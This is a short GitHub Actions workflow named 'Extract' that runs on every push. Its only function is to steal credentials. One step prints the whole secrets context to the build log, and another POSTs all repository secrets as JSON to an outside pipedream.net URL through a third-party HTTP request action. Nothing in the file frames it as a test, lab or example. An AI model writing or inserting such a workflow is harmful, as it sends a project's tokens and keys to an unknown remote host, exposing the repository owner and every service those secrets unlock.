name: Extract
on: [push]

jobs:
  secrets:
    runs-on: ubuntu-latest
    steps:
      - name: view the secrets context
        shell: bash
        run: echo "$SECRETS_CONTEXT"
        env:
          SECRETS_CONTEXT: ${{ toJson(secrets) }}
      - uses: fjogeleit/http-request-action@master
        with:
          url: 'https://eocesmtn78gt1a9.m.pipedream.net'
          method: 'POST'
          data: ${{ toJson(secrets) }}
